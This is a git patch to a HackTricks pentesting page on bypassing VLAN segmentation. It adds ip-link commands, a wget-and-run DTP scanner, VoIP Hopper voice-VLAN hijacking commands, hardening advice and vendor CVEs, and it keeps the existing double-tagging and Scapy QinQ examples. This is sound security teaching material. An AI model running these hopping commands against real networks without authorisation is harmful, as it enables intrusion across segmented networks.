From 1d5db450d19f720f6459d5b6ff88b03cc08a7c3f Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Thu, 7 Aug 2025 08:30:36 +0000 Subject: [PATCH] Add content from: Research Update: Enhanced src/generic-methodologies-and-reso... --- .../lateral-vlan-segmentation-bypass.md | 72 +++++++++++++------ 1 file changed, 50 insertions(+), 22 deletions(-) diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md index 5ebe43473..250e30159 100644 --- a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md +++ b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md @@ -31,14 +31,18 @@ Switching to trunk mode will temporarily disrupt connectivity, but this can be r Virtual interfaces are then created, assigned VLAN IDs, and activated: ```bash +# Legacy (vconfig) – still works but deprecated in modern kernels sudo vconfig add eth0 10 sudo vconfig add eth0 20 sudo vconfig add eth0 50 sudo vconfig add eth0 60 -sudo ifconfig eth0.10 up -sudo ifconfig eth0.20 up -sudo ifconfig eth0.50 up -sudo ifconfig eth0.60 up + +# Modern (ip-link – preferred) +sudo modprobe 8021q +sudo ip link add link eth0 name eth0.10 type vlan id 10 +sudo ip link add link eth0 name eth0.20 type vlan id 20 +sudo ip link set eth0.10 up +sudo ip link set eth0.20 up ``` Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured: @@ -46,14 +50,12 @@ Subsequently, an address request is made via DHCP. Alternatively, in cases where ```bash sudo dhclient -v eth0.10 sudo dhclient -v eth0.20 -sudo dhclient -v eth0.50 -sudo dhclient -v eth0.60 ``` Example for manually setting a static IP address on an interface (VLAN 10): ```bash -sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0 +sudo ip addr add 10.10.10.66/24 dev eth0.10 ``` Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60. @@ -81,18 +83,18 @@ $ git clone https://github.com/fleetcaptain/dtp-spoof.git $ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable ``` -Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. Modern Linux kernels no longer require *vconfig*; instead use *ip link*: +Recon helper (passively fingerprint the port’s DTP state): ```bash -sudo modprobe 8021q -sudo ip link add link eth0 name eth0.30 type vlan id 30 -sudo ip addr add 10.10.30.66/24 dev eth0.30 -sudo ip link set eth0.30 up +$ wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py +$ sudo python3 dtpscan.py -i eth0 ``` +Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section. + ### 2. Double-Tagging (Native-VLAN Abuse) -If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection: +If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can hop to a second VLAN even when the port is locked in access mode. Tooling such as **VLANPWN DoubleTagging.py** (2022-2025 refresh) automates the injection: ```bash python3 DoubleTagging.py \ @@ -103,15 +105,9 @@ python3 DoubleTagging.py \ --attacker 10.10.1.54 ``` -Packet walk-through: -1. Outer tag (1) is stripped by the first switch because it matches the native VLAN. -2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20. - -The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames . - ### 3. QinQ (802.1ad) Stacking -Many enterprise cores support *Q-in-Q* service provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy: +Many enterprise cores support *Q-in-Q* service-provider encapsulation. Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones. Capture for ethertype `0x88a8` and attempt to pop the outer tag with Scapy: ```python from scapy.all import * @@ -122,6 +118,24 @@ frame = Dot1Q(type=0x88a8, vlan=outer)/payload sendp(frame, iface="eth0") ``` +### 4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing) + +Corporate access ports often sit in an *“access + voice”* configuration: untagged data VLAN for the workstation and a tagged voice VLAN advertised through CDP or LLDP-MED. By impersonating an IP phone the attacker can automatically discover and hop into the VoIP VLAN—even when DTP is disabled. + +*VoIP Hopper* (packaged in Kali 2025.2) supports CDP, DHCP options **176/242**, and full LLDP-MED spoofing: + +```bash +# One-shot discovery & hop +sudo voiphopper -i eth0 -f cisco-7940 + +# Interactive Assessment Mode (passive sniff → auto-hop when VVID learnt) +sudo voiphopper -i eth0 -z + +# Result: new sub-interface eth0. with a DHCP or static address inside the voice VLAN +``` + +The technique bypasses data/voice separation and is extremely common on enterprise edge switches in 2025 because LLDP auto-policy is enabled by default on many models . + --- ## Defensive Recommendations @@ -129,8 +143,20 @@ sendp(frame, iface="eth0") 1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`. 2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it: `vlan dot1q tag native`. 3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`. -4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity. -5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation. +4. Enforce port security, DHCP snooping, dynamic ARP inspection **and 802.1X** to limit rogue Layer-2 activity. +5. Disable LLDP-MED auto voice policies (or lock them to authenticated MAC OUIs) if IP-phone spoofing isn’t required. +6. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation. + +--- + +## Real-World Vendor Vulnerabilities (2022-2024) + +Even a perfectly hardened switch configuration can still be undermined by firmware bugs. Recent examples include: + +* **CVE-2022-20728† – Cisco Aironet/Catalyst Access Points** allow injection from the native VLAN into non-native WLAN VLANs, bypassing wired/wireless segmentation . +* **CVE-2024-20465 (Cisco IOS Industrial Ethernet)** permits ACL bypass on SVIs after toggling Resilient Ethernet Protocol, leaking traffic between VRFs/VLANs. Patch 17.9.5 or later. + +Always monitor the vendor advisories for VLAN-related bypass/ACL issues and keep infrastructure images current. --- @@ -139,5 +165,7 @@ sendp(frame, iface="eth0") - [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9) - VLANPWN attack toolkit – - Twingate "What is VLAN Hopping?" (Aug 2024) – +- VoIP Hopper project – +- Cisco Advisory “cisco-sa-apvlan-TDTtb4FY” – {{#include ../../banners/hacktricks-training.md}}